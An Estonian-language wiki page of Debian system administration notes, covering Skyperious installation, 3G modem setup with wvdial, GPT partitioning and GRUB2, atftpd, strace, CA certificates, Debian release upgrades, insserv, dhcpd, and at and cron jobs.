Head inimesed on programmeerinud Python keeles tarkvara Skyperious http://suurjaak.github.io/Skyperious/index.html, mille abil saab Skype andmebaaside sisu, st praktiliselt jutuajamist ajalugu, uurida ilma Skype programmi enda, võrguühenduse jms olemasoluta. Tundub, et programm kasutab asjaolu, et vastav andmebaas on praktiliselt SQLite andmebaas. Praktiliselt võib see olla abiks kui Skype versiooni uuendamisel ei õnnestu chat history sisu uude versiooni kaasa võtta, nt v. 4.2 -> 4.3 uuendamisel Linux all. Skyperiuos kasutajaliides paistab selline

[[Pilt:Skyperious-1.gif]]

Tarkvara paigaldamist kirjeldatakse aadressil https://github.com/suurjaak/Skyperious. Lühidalt tuleb Debian Jessie all öelda

# apt-get install wx2.8-i18n libwxgtk2.8-dev libgtk2.0-dev
# apt-get install python-wxgtk2.8 python-wxtools
# apt-get install python-pip

Seejärel lähtetekst lahti pakkida ja öelda

# pip install --allow-all-external --allow-unverified -r requirements

Kasutajana käivitamisel öeldakse alustuseks

$ skyperious.sh
-su: skyperious.sh: /bin/sh^M: bad interpreter: No such file or directory

millest saab üle nn dos reavahetuste eemaldamisega

# fromdos skyperious.sh

====Misc====

Skype vestlusaknas saab teksti parandada nn Sed süntaksit kasutades

mart: priiti, ei ole võimalik

,-------------------------------,
| s/priiti/Priit/ |
|_______________________________|

http://share.skype.com/sites/linux/2009/09/some_explanations.html

===PulseAudio kasutamine===

http://pulseaudio.org/

===Huawei netipulga kasutamine===

2010 aastal on populaarne kasutada mobiilse internetiühenduse teenust Huawei USB netipulga abil. Sellist tüüpi netipulgad on sisuliselt GSM modemid, mis ühendatakse arvutiga USB kaudu ning mille kasutamiseks peab seadmesse olema paigaldatud mobiilside operaatori kehtiv SIM-kaart (Subscriber Identity Module). Selline netipulk ei ole kuidagi seotud wifiga ning seda saab kasutada asudes mobiilside operaatori levialas. Netipulga kasutamiseks peab olema arvutisse paigaldatud PPP kliendi tarkvara, nt wvdial ja arvuti oskama kasutada USB-serial seadmeid.

Kasulikud lisamaterjalid

* http://wiki.debian.org/Modem/3G

====Riistvara====

Näiteks olgu kasutada Huawei E620 USB Modem seade ning teenusepakkuja EMT andmesideteenus.

# lsusb
...
Bus 002 Device 003: ID 12d1:1001 Huawei Technologies Co., Ltd. E620 USB Modem

====Tarkvara====

Netipulga kasutamiseks piisab Debian Lenny paketihalduse tarkvarast, st vajalikest tuuma moodulitest ning wvdial programmist, mille paigaldamiseks sobib öelda

# apt-get install wvdial

====Seadistamine ja käivitamine====

Esmalt tuleb laadida maha usb-storage, option ja usbserial tuuma moodulid

# rmmmod usb-storage
# rmmod option
# rmmod usbserial

ning laadida usbserial sobivate parameetritega, vastavalt käesolevale lsusb väljundile, nt

# modprobe usbserial vendor=0x12d1 product=0x1001

Tulemusena on kasutada USB-serial seadmed

# ls -l /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Apr 27 23:46 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Apr 27 23:15 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Apr 27 23:15 /dev/ttyUSB2
crw-rw---- 1 root dialout 188, 3 Apr 27 23:15 /dev/ttyUSB3

wvdial tarkvara tööd juhib seadistusfail /etc/wvdial.conf

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone = *99***1#
Username = username
Password = password
Stupid Mode = 1
Dial Command = ATDT

[Dialer hsdpa]
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ISDN = 0
Modem Type = Analog Modem

kus

* Phone - väärtus sõltub teenusepakkujast

Käivitamiseks sobib öelda juurkasutajana

# wvdial hsdpa
--> WvDial: Internet dialer version 1.60
--> Cannot get information for serial port.
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: ATZ
ATZ
OK
--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
OK
--> Modem initialized.
--> Sending: ATDT*99***1#
--> Waiting for carrier.
ATDT*99***1#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Tue Apr 27 23:41:55 2010
--> Pid of pppd: 7879
--> Using interface ppp0
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> pppd: @« @« x«
--> local IP address 192.168.3.91
--> pppd: @« @« x«
--> remote IP address 10.64.64.64
--> pppd: @« @« x«
--> primary DNS address 192.168.32.116
--> pppd: @« @« x«
--> secondary DNS address 192.168.32.115
--> pppd: @« @« x«

Tulemusena tekib süsteemi juurde PPP seade, nt

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.3.91 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:3 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:118 (118.0 B) TX bytes:157 (157.0 B)

====Netipulga kasutamine====

Peale PPP lingi tekkimist piisab liiklus ruutida üle selle lingi ning saab kasutada võrku, nt

# route add -net 172.23.0.0 netmask 255.255.0.0 gw 192.168.3.91

Lisaks nö sihipärasele mobiilsele töökohale andmeside tekitamisele on võimalikud nt sellised kasutusalad

* ühendada võrku arvuteid, mida muul viisil võib olla tülikas ühendada
* ühendada arvutile külge alternatiivne andmesidekanal (nt monitooringuarvutist teadete saatmiseks)

Kasutamisel tuleb arvestada, et läbi lisandunud seadme on võimalik lisaks välja pöördumisele ka sisse pöörduda, seepärast tasub kaaluda seoses netipulgaga paketifiltri kasutamist.

===ffmpeg kasutamine===

ffmpeg tarkvara abil saab ekraanil toimuvat nö videona salvestada

$ ffmpeg -f x11grab -s 720x480 -r 23.976 -i :0.0 /tmp/file.mpg

QuickTime andmete teisendamine

$ ffmpeg -i video-in.mov -vcodec mpeg4 video-out.avi

QuickTime teisendamine Digital Video formaati

$ ffmpeg -i fail.mov -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 fail.dv

Taasesitamine nö ressursisäästlikult

$ mplayer -vo xv -vfm ffmpeg -lavdopts lowres=1:fast:skiploopfilter=1 video-out.avi

Kasulikud lisamaterjalid

* http://viki.pingviin.org/MPlayer
* http://www.kinodv.org/

===Märkused===

* Selleks, et vaikimisi ei seataks pakettidele DF (don't fragment), sobib öelda

# sysctl -w net.ipv4.ip_no_pmtu_disc=1

* arvuti viimaseid reboote näitab käsk

# last reboot -f /var/log/wtmp.1
reboot system boot 3.16.0-4-amd64 Fri Aug 7 00:35 - 02:03 (38+01:27)
reboot system boot 3.16.0-4-amd64 Wed Aug 5 00:14 - 00:35 (2+00:20)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:57 - 23:51 (00:53)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:56 - 22:57 (00:01)

kus esimese rea teine kellaaeg on käesolev aeg (ja liigub), sulgudes on praktiliselt arvuti käesolev uptime; teiste ridade sulgudes on vastavad uptime ajad

* Failide-alamkataloogide-jms arv kataloogis

# for i in `ls -d /*` ; do echo -n "$i: "; find $i | wc -l; done

===PCMCIA seadmete kasutamine===

# apt-get install pcmciautils

===ExpressCard seadmete kasutamine===

Reeglina paistavad ExpressCard http://en.wikipedia.org/wiki/ExpressCard seadmed operatsioonisüsteemile USB seadmetena.

===syslog-ng kasutamine logiserverina===

syslog-ng http://www.balabit.com/network-security/syslog-ng/ sobib kasutada logiserveris ja tal on sellised omadused

* TODO

Debian Lenny sisaldab syslog-ng versioon 2.0, paigaldamiseks tuleb öelda

# apt-get install syslog-ng

Tarkvara tööd juhib seadistusfail /etc/syslog-ng/syslog-ng.conf

===Failisüsteem===

Debiani failisüsteemiga on seotud operatsioonisüsteemi seisukohalt sellised üldised asjaolud

* /proc ja /sys kataloogid on nö vaated töötavale linuxi tuumale

====Named ja unnamed pipe====

Pipe on FIFO ja selle instrumendi abil saavad programmid omavahel andmeid vahetada, nt named pipe puhul sobib ühes aknas öelda

$ mkfifo /tmp/fifonimi
$ cat < /tmp/fifonimi

ja teises aknas öelda

$ cal > /tmp/fifonimi

siis tulemusena esitatakse esimeses aknas cal käsu väljund.

Osutub, et pipe ei ole alati vajalik moodustada mkfifo käsu abil, sobib ka nii, sellisel juhul on tegu anonüümse pipe'iga

$ cal | cat

===Pidgin===

Pidgin (nö vana nimega Gaim) http://www.pidgin.im/ on mitmeid protokolle toetav instant messaging tarkvara. Kuna Debiani paketihalduse Pidgin tõrgub vahel, siis üks otsekohene alternatiiv on kasutada lähtetekstist kompileeritud Pidgini

# apt-get build-dep pidgin
$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn
$ make
$ make install

Pidgin v. 2.10.0, tundub, et kui kasutada süsteemis mozilla.debian.net tarkvara, siis ebaõnnestub sõltuvuste tõttu

# apt-get build-dep pidgin

Sellisel juhul tuleb käsitsi paigaldada

# apt-get install intltool libglib2.0-dev libgtk2.0-dev

$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn --disable-nm --disable-screensaver \
--disable-gtkspell --disable-gstreamer --disable-meanwhile --disable-avahi --disable-dbus --disable-tk
...

===lm-sensors===

lm-sensors http://www.lm-sensors.org/ tarkvara paigaldamiseks sobib öelda

# apt-get install lm-sensors

Esmalt tuleb teha kindlaks olemasolev riistvara ning laadida vastavad moodulid

# sensors-detect

Kasutamiseks öelda nt

# sensors -A | grep Core
Core 0: +47.0 C (high = +76.0 C, crit = +100.0 C)
Core 1: +51.0 C (high = +76.0 C, crit = +100.0 C)
Core 2: +41.0 C (high = +76.0 C, crit = +100.0 C)
Core 3: +41.0 C (high = +76.0 C, crit = +100.0 C)

kus

* Core N - protsessori tuuma temperatuur

===GPT kasutamine===

GPT (GUID Partition Table) http://en.wikipedia.org/wiki/GUID_Partition_Table on seotud järgmiste probleemide lahendamisega

* operatsioonisüsteemis soovitakse kasutada suuremat partitsiooni kui 2TB
* arvuti riistvara ei kasuta nn PC-BIOS'i vaid nt UEFI't (Unified Extensible Firmware Interface)
* kasutatakse 4096 B plokisuurusega kõvaketast
* saab kasutada kuni 128 nn primary partitsiooni

====GPT partitsioonide haldamine====

GPT partitsioonide haldamiseks sobib 2010 aasta suvel kasutada nt programme parted ja gdisk, esmalt tuleb moodustada plokkseadmele label öeldes

# parted /dev/sdc
(parted) mklabel gpt
Warning: The existing disk label on /dev/sdc will be destroyed and all data on this disk will be lost. Do you want to continue?
Yes/No? Yes

TODO

Kui kasutada fdisk programmi GPT partitsioonitabelit kasutava plokkseadmega, siis paistab tulemus selline

# fdisk -uc /dev/sda -l
WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted.
...
Device Boot Start End Blocks Id System
/dev/sda1 1 10485759 5242879+ ee GPT

====GRUB2 alglaaduri kasutamine GPT ja PC-BIOS riistvaraga====

Kui UEFI riistavara töötab GRUB2 alglaaduri ja GPT partitsioneeritud kõvakettaga nö otseselt, siis PC-BIOS arvuti puhul tuleb kasutada seejuures mõnda täiendavat võtet. Üldiselt toimub PC-BIOS riistvaral töötava süsteemi alglaadimine selliselt

* kõvakettale on moodustatud kolm GPT partitsiooni

(parted) p

Number Start End Size File system Name Flags
1 2048s 4095s 2048s biosboot bios_grub
2 4096s 1052671s 1048576s boot
3 1052672s 3905974271s 3904921600s system

* alglaadimisel loetakse üks alglaaduri aste esimeselt partitsioonilt
* järgmised astmed ning operatsioonisüsteemi tuum ja initramfs loetakse boot partitsioonilt
* operatsioonisüsteemi juurfailisüsteem asub kolmandal partitsioonil või sellel paiknevalt loogiliselt seadmelt, nt LVM köitelt

=====GPT partitsioonide moodustamine=====

(parted) unit s
(parted) mkpart biosboot 2048 4095
(parted) set 1 bios_grub on
(parted) mkpart boot 4096 1052671
(parted) mkpart system 1052672 3907026943
(parted) set 3 lvm on

kus

* tuleb jälgida, et partitsioonide suurused saavad sobivad, kaks esimest võiksid olla suhtliselt universaalselt sobivad

=====Failisüsteemide ettevalmistamine=====

GPT pealt töötava süsteemi saab ettevalmistada nt ühendades vastav plokkseade külge mõnele olemasolevale töötavale süsteemile. Seejärel moodustada seadmele GPT partitsioonitabel, failisüsteemid ning kopeerida sinna töötav süsteem üle, nt rsync abil.

=====GRUB2 seadistamine ja paigaldamine=====

GRUB2 seadistamiseks sobib kasutada nt sellist /etc/grub.d/40_custom faili

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries. Simply type the
# menu entries you want to add after this comment. Be careful not to change
# the 'exec tail' line above.

echo "Debian GPT" >&2
menuentry "Debian GPT" {
insmod part_gpt
insmod ext2
set root=(hd0,gpt2)
linux /vmlinuz-2.6.32-2-amd64 root=/dev/mapper/system-root ro
initrd /initrd.img-2.6.26-2-amd64
}

kus

* insmod part_gpt - grub2 laadib omale GTP partitsioonitabeli tundmise tarkuse
* (hd0,gpt2) - näitab millisel GPT partitsioonil asub /boot failisüsteem

Eeldusel, et failisüsteemid on monteeritud öelda

# grub-install --recheck --no-floppy --root-directory=/mnt/root /dev/sda
Installation finished. No error reported.

Tulemusena peaks arvuti käivituma.

====4096 B plokisuurusega kõvaketaste kasutamine====

2010 aasta suvel on 4k plokisuurusega kõvaketaste kasutamine pisut ebaselge, tundub, et üldiselt peaks utiliidid sellega automaatselt hiljem või varem hakkama saama. Hetkel näib ohutu nö käsitsi arvestada, et partitsiooni algus satuksid arvudega 8 ja 512 jaguvatele kohtadele, nt kasutades GPT partitsioonitabelit selliselt

(parted) unit s
(parted) mkpart system 2048 327679999
(parted) mkpart pgdata 327680000 164863999

kus

* unit s - edasi esitatakse partitsiooni algus ja lõpp sektori numbrina
* system - partitsiooni nimi kasutajale tähendust omaval kujul
* 2048 - partitsiooni algussektor
* 327679999 - partitsiooni lõpp sektor, arvestusega, et 327679999 + 1 jagub arvudega 8 ja 512

Paritsioonitüüpide näitamiseks öelda

(parted) set 1 lvm on
(parted) set 2 lvm on

Tulemuseks on

(parted) p
Model: ATA WDC WD2003FYYS-0 (scsi)
Disk /dev/sdc: 3907029168s
Sector size (logical/physical): 512B/512B
Partition Table: gpt

Number Start End Size File system Name Flags
1 2048s 327679999s 327677952s system lvm
2 327680000s 328703999s 1024000s pgdata lvm

Kui selliselt ettevalmistatud plokkseadmel kasutada failisüsteemi või nt mdadm, lvm või cryptsetup lahendusi, siis väidetavalt neile sobib 4k plokisuuris hästi.

====Kasulikud lisamaterjalid====

* http://www.ibm.com/developerworks/linux/library/l-4kb-sector-disks/
* http://www.johannes-bauer.com/linux/wdc/?menuid=3
* http://grub.enbug.org/BIOS_Boot_Partition
* http://wiki.archlinux.org/index.php/User:Skodabenz/GPT
* http://jamie.mayfirst.org/posts/2010/two-tb-disks/
* http://www.wensley.org.uk/gpt

===atftpd kasutamine===

atftpd on tftpd server ning atftp vastav klient.

====Server====

Serveri paigaldamiseks sobib öelda

# apt-get install atftpd

Seejuures küsitakse hulk küsimusi, vaikimisi käivitatakse paigaldamise lõpuks tftp teenus inetd superserverist ning kataloogiks on /srv/tftp.

Tööd juhitakse

* /etc/default/atftpd failis

USE_INETD=true

* /etc/inetd.conf failis sarnase reaga

tftp dgram udp4 wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd --tftpd-timeout 300 \
--retry-timeout 5 --no-multicast --maxthread 100 --verbose=5 --logfile /var/log/atftpd.log /srv/tftp

====Klient====

Kliendi paigaldamiseks sobib öelda

# apt-get install atftp

Kasutamiseks öelda nt

$ atftp 192.168.10.10
tftp> get /srv/tftp/sg200-18-20131217-mirror.conf

Tulemusena kopeeritakse fail kliendi käesolevasse kataloogi.

===strace programmi kasutamine===

Nö failisüsteemi tcpdump kasutamiseks sobib esmalt vaadata nt veebiseveri protsesside numbrid ja seejärel öelda

$ strace -p 19282 -p 19283 -p 19284 -p 19285 -p 19286 -p 19368 -p 20015 -p 29774 -p 29775 -f -e trace=open

kus

* -f - järgib forkisid
* -e määratleb, et jälgitakse failiavamisi

Märkused

* kui kasutada mitu korda -e parameetrit, siis kehtestub ainult viimane kasutamine
* kui kasutada -e järel mitut väärtust, nt '-e trace=read,write', siis väärtused OR-itakse kokku
* kui on soov jälgida konkreetse file descriptori kasutusi, siis tuleb strace väljundi teksti töödelda grep vms üldiste vahenditega
* shelli protsessi on huvitav strace'ida teisest aknast

Kasulikud lisamaterjalid

* http://myhowto.org/solving-problems/7-exploring-system-internals-with-lsof-and-strace/
* http://www.noah.org/wiki/Debugging_notes

===Debian Squeeze paigaldamine USB pulgalt===

Debian Squeeze operatsiooniüsteemi USB pulgalt paigaldamise eeldusteks on

* kasutada on olemasolev võrguühendusega Linux arvuti
* installeeritav arvuti boodib USB pulgalt
* installeeritava arvuti saab ühendada võrku

USB pulk tuleb Debian Squeeze paigaldamiseks ettevalmistada järgmiselt

* vastaku USB pulgale seade /dev/sdf, pulk peab olema monteerimata olekus, st öelda

# umount /dev/sdf

* lähtudes aadressilt http://www.debian.org/devel/debian-installer/ kopeerida sobivad boot.img.gz ning netinst.iso failid, nt

# http://ftp.nl.debian.org/debian/dists/testing/main/installer-amd64/current/images/hd-media/boot.img.gz
# http://cdimage.debian.org/cdimage/squeeze_di_rc1/amd64/iso-cd/debian-sq-di-rc1-amd64-netinst.iso

* kopeerida boot.img.gz pulgale öeldes

# zcat boot.img.gz > /dev/sdf

* monteerida pulk ning kopeerida netinst iso

# mkdir /mnt/sdf
# mount /dev/sdf /mnt/sdf
# cp debian-sq-di-rc1-amd64-netinst.iso /mnt/sdf

* ainult nn kommertsdraiveritega töötava riistvara kasutamiseks on vajalik lisaks kopeerida arhiiv firmware.tar.gz aadressilt http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/, nt

# wget http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/squeeze/current/firmware.tar.gz

ning pakkida lahti pulga juurikale kataloogi firmware

# mkdir /mnt/sdf/firmware
# tar -C /mnt/sdf/firmware -z -x -f firmware.tar.gz

Lõpuks tuleb pult lahti monteerida

# umount /mnt/sdf

Pulga kasutamiseks tuleb pult ühendada kõnealuse arvutiga, BIOS'ist seadistada käivituma USB pulgalt ning algab tarkvara paigaldus. Paigalduse käigus peaks olema kasutada internetiühendus.

===SSL juur-sertifikaatide lisamine===

Selleks, et süsteemi utiliidid, nt wget tunnustaksid veebiserveri sertifikaati peab olema vastav juur-sertifikaat ära kirjeldatud. Juur-sertifikaadi lisamiseks tuleb

* paigaldada pakett ca-certificates

# apt-get install ca-certificates

* kopeerida uus juur-sertifikaat kataloogi /usr/local/share/ca-certificates (failinimi peab lõppema .crt vastasel korral update-ca-certificates skript seda ei käsitle)

# cp Juur-LOOMAAED-cacert.pem /usr/local/share/ca-certificates/Juur-LOOMAAED.crt

* öelda

# update-ca-certificates

Tulemusena genereeritakse uued c_rehashid kataloogi /etc/ssl/certs

# ls -l /etc/ssl/certs/ | grep Juur
lrwxrwxrwx 1 root root 44 Feb 3 14:18 Juur-LOOMAAED.pem -> /usr/local/share/ca-certificates/Juur-LOOMAAED.crt
lrwxrwxrwx 1 root root 11 Feb 3 14:18 a376ee62.0 -> Juur-LOOMAAED.pem

ning lisatakse ta suurfaili /etc/ssl/certs/ca-certificates.crt.

===Debian v. 4 Etch -> v. 5 Lenny uuendamine===

Kui sources.list failis lenny kasutamise järel apt-get update ütleb vea

W: There is no public key available for the following key IDs:
4D270D06F42584E6
W: You may want to run apt-get update to correct these problems

siis aitab paigaldada debian-archive-keyring pakett

# apt-get install debian-archive-keyring

Kui kasutusel on uuemad bnx2 draiveriga käivad võrgukaardid, siis tuleb jälgida, et oleks paigaldatud pakett firmware-bnx2

# apt-get install firmware-bnx2

===Debian v. 5 Lenny -> v. 6 Squeeze uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 5.0 -> v. 6.0) juhend asub aadresil http://www.debian.org/releases/squeeze/amd64/release-notes/ch-upgrading.en.html

Uuendamise on oluline tähele panna järgmisi asjaolusid

* asutakse kasutama dash shelli nö süsteemse shellina, mh tähendab see, et /bin/sh -> bash asemel on

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Dec 26 2010 /bin/sh -> dash

* asuda uuendama süsteemi, millele on kõik Lenny uuendused rakendatud
* asendatakse legacy GRUB GRUB2 alglaaduriga, vajadusel anda pärast uuendust töötavas Squeeze süsteemis käsk upgrade-from-grub-legacy
* veenduda enne uuendamise protseduuri, et failisüsteemis on piisavalt vaba ruumi
* asutakse bootloaderis kasutama failisüsteemide plokkseadmetele vastavaid UUID väärtusi
* eemdalda paketihaldusest mitte paigaldatud tarkvara (nt VMWare Tools)
* eemaldada /etc/ alt nö käsitsi lisatud start-up skriptid, mis võivad segada automaatset süsteemi migreerimist kasutama insserv käivitusskripte

====Uuendamise protseduur====

* veenduda, et on olemas süsteemist varukoopia
* rakendada paketihaldusest uuendused vanale süsteemile
* teha seadistusfailidest koopia, et oleks mugav võrrelda

# cp -a /etc /root/etc-20110522-tootanud-lenny
# cp -a /boot /root/boot-20110522-tootanud-lenny

* eemaldada paketihaldusest mitte paigaldatud tarkvara, nt

# vmware-uninstall.pl

* kasutada /etc/apt/sources.list faili sisuga, uuendamise ajal on security välja kommenteeritud

deb http://ftp.ee.debian.org/debian/ squeeze main contrib non-free
deb-src http://ftp.ee.debian.org/debian/ squeeze main contrib non-free

# deb http://security.debian.org/ squeeze/updates main contrib non-free
# deb-src http://security.debian.org/ squeeze/updates main contrib non-free

ning öelda

# apt-get update
# apt-get dist-upgrade -d

* kasutada script'i esitatud küsimuste-vastuste-teadete salvestamiseks, mis töötab üldiselt nii

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script
Script started, file is /root/upgrade-squeezestep.script
# date
...
# Ctrl-D
Script done, file is /root/upgrade-squeezestep.script

script tööga kaasneb kaks protsessi

# ps aux | grep scr
root 4960 0.0 0.0 5848 572 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script
root 4961 0.0 0.0 5852 460 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script

* käivitada script abil salvestamine

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script

* uuendada tuum ja udev

# apt-get install linux-image-2.6-amd64

Seejuures pakutakse ja võiks aktsepteerida plokkseadmete UUID väärtuste kasutamist.

# apt-get install udev

* vajadusel paigaldada non-free firmware draiverid öeldes (nt bnx 10g seadme jaoks)

# apt-get install firmware-linux-nonfree

* veenduda, et /boot/grub/menu.lst algaadib uue tuumaga, /etc/fstab ühendab külge sobivad failisüsteemid ja alglaadida süsteem
* veenduda, et failisüsteemis on piisavalt ruumi, käivitada script ja paigaldada muud süsteemi uuendused

# script -t 2>~/dist-upgrade-squeezestep.time -a ~/dist-upgrade-squeezestep.script
# apt-get dist-upgrade

* dash shelli kasutamiseks öeldakse

The system shell is the default command interpreter for shell scripts.

Using dash as the system shell will improve the system's overall performance. It does not alter the shell
presented to interactive users. Use dash as the default system shell (/bin/sh)?

* dist-upgrade käigus üritatakse migreerida dependecy-based insserv käivitusskriptidele

The boot system is prepared to migrate to dependency-based sequencing. This is an irreversible step, but one that is recommended:
it allows the boot process to be optimized for speed and efficiency, and provides a more resilient framework for development.

A full rationale is detailed in /usr/share/doc/sysv-rc/README.Debian. If you choose not to migrate now, you can do so later by
running "dpkg-reconfigure sysv-rc".

Migrate legacy boot sequencing to dependency-based sequencing?

* Uuendamisel tuleb kasutaja poolt muudetud seadistusfailid lasta uute nn package maintainer versiooniga üle kirjutada ja pärast muudatused käsitsi kohendada, nimekirja muudetud failidest näeb nt nii

# grep "Configuration file" dist-upgrade-squeezestep.script
Configuration file `/etc/security/limits.conf'
Configuration file `/etc/nagios/nrpe.cfg'
Configuration file `/etc/sysctl.conf'
Configuration file `/etc/rsyslog.conf'
Configuration file `/etc/ssh/ssh_config'
Configuration file `/etc/apache2/apache2.conf'
Configuration file `/etc/apache2/ports.conf'
Configuration file `/etc/joe/joerc'
Configuration file `/etc/snmp/snmpd.conf'
Configuration file `/etc/default/snmpd'

kusjuures asendatud failst salvestatakse reeglina koopia nimele lisades lõppu .dpkg-old, nt

/etc/snmp/snmpd.conf.dpkg-old

st ülekirjutatud failid leiab nt nii

# find /etc/ -name \*-old

* vmware tools kompileerimise asemel on alternatiiv kasutada paketti open-vm-tools, kasutaja peab ise otsustama mida eelistada

# apt-get install open-vm-tools
...
Loading open-vm-tools modules: vmhgfsFATAL: Module vmhgfs not found.
vmmemctlFATAL: Module vmmemctl not found.
vmsyncFATAL: Module vmsync not found.

* vajadusel öelda

# dpkg-reconfigure sysv-rc

* vajadusel öelda (kui uuendatavas süsteemis mingil põhjusel oli alglaadur paigaldamata paketihaldusest)

# apt-get install grub-pc

* vajadusel öelda

# upgrade-from-grub-legacy

* kasutuses mitte olevate pakettide eemaldamine

# apt-get autoremove

* eemaldada /etc/apt/sources.list failid security eest kommentaarid ja rakendada uuendused
* kohendada käsitsi paketihaldusest uuendamise käigus vaikeväärtustega asendatud seadistusfailid

====Märkused====

* kui uuendamine peatub seetõttu, et mõne nö ebaolulise programmi käivitusskript ei tööta, siis sobib vastav pakett eemaldada, kui ka see ei õnnestu, siis võiks proovida käivitusskripti sisu asendada millegagi, mis formaalselt toimib, nt

# cat /etc/init.d/nagios3
#! /bin/sh
exit 0;

===Debian v. 6 Squeeze > v. 7 Wheezy uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 6.0 -> v. 7.0) juhend asub aadresil http://www.debian.org/releases/stable/amd64/release-notes/ch-upgrading.en.html

Debian v. 7 Wheezy GRUB2 versiooni on number selline

GNU GRUB version 1.99-27+deb7u1

Kui 2015 kevadel öelda

# apt-get update
Hit http://ftp.ee.debian.org wheezy Release.gpg
...
Reading package lists... Done
W: There is no public key available for the following key IDs:
7638D0442B90D010

siis aitab

# apt-get install debian-keyring debian-archive-keyring

===Debian v. 8 Jessie -> v. 9 Stretch uuendamine===

Operatsioonisüsteemi uuendus toimub nagu tavaliselt, kuid viimaks sobib öelda

# aptitude search ?obsolete
# aptitude purge ?obsolete

MySQL -> MariaDB uuendus toimub üldiselt automaatselt, aga sobib lõpus öelda (vt ligipääs failist /etc/mysql/debian.cnf)

# mysql_upgrade -h localhost -u debian-sys-maint -pparool

Kasulikud lisamaterjalid

* https://www.debian.org/releases/stretch/amd64/release-notes/ch-upgrading.en.html
* https://www.auul.pri.ee/wiki/MySQL_andmebaasi_kasutamine_operatsioonis%C3%BCsteemiga_Debian#Andmebaasi_uuendamine_MySQL_v._5.5_-.3E_MariaDB_v._10.1

===insserv käivitussüsteemi kasutamine===

Debian Squeeze v. 6.0 kasutab nn System-V-like käivitusskripte, kusjuures nende tööd saab seadistada insserv tarkvaraga

# cat /etc/init.d/nfsen
#!/bin/sh
set -e

### BEGIN INIT INFO
# Provides: nfsen
# Required-Start: $local_fs $remote_fs $network $time
# Required-Stop: $local_fs $remote_fs $network $time
# Should-Start: $syslog
# Should-Stop: $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: NfSen Server
### END INIT INFO

#!/bin/bash
case "$1" in
start)
echo "Starting NfSen server"
/srv/nfsen/bin/nfsen start
;;
stop)
echo "Stopping NfSen server"
/srv/nfsen/bin/nfsen stop
;;
*)
echo "Usage: /etc/init.d/nfsen {start|stop}"
exit 1
esac
exit 0

/etc/rc3.d jt rc kataloogide alla tekivad lingid öeldes

# insserv nfsen

Käivitusskriptile linkide eemaldamiseks sobib öelda

# insserv -r nfsen

Lisaks -n võtme lisamine ainult näitab, mis toimuks

# insserv -n -d nfsen

Required-Start: rea lõppu lisades nt 'postgresql' tulemusena käivitatakse kõnealune programm peale PostgreSQL andmebaasi.

Lisamaterjalid:

* http://wiki.debian.org/LSBInitScripts
* http://wiki.debian.org/LSBInitScripts/DependencyBasedBoot

===Dhcpd serveri kasutamine===

ISC DHCP tarkvara paigaldamiseks sobib öelda

# apt-get install dhcp3-server

DHCP serveri tööd juhib seadistusfail, nt

# cat /etc/dhcp/dhcpd.conf
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
log-facility local7;

shared-network auul {
option domain-name "auul";
option domain-name-servers 10.192.0.53;

subnet 192.168.50.0 netmask 255.255.255.0 {
range 192.168.50.200 192.168.50.224;
option routers 192.168.50.10;
}
}

Lisaks näidatakse failis /etc/default/isc-dhcp-server millistel võrguseadmetel teenust pakutakse

# cat /etc/default/isc-dhcp-server
...
INTERFACES="eth1"

DHCP serveri käivitab skript

# /etc/init.d/isc-dhcp-server stop|start

===At tööd===

Töö tekitamiseks sobib öelda

$ echo "date >> /tmp/test.log" | at -t 201509250950

Tööde nimekirja esitamiseks

$ atq
10 Fri Sep 25 09:50:00 2015 a imre

Tehtud tööd eemaldatakse automaatselt, tuleviku tööde eemaldamiseks

$ atrm 10

Töö sisu esitamiseks

$ at -c 10

===Cron tööd===

Debiani cron töid juhivad sellised seadistusfailid

* /etc/crontab
* /etc/cron.d - kataloogis sisalduvaid faile käsitletakse cron kirjeldusfailidena, /etc/crontab formaadis (st sisaldub user väli)
* /etc/cron.daily
* /etc/cron.hourly
* /etc/cron.monthly
* /etc/cron.weekly
* /var/spool/cron/kasutajanimi

Kasulikud lisamaterjalid

* man cron

===Anacron===

Anacron http://anacron.sourceforge.net/ ...

===tcp wrapper teegi kasutamine===

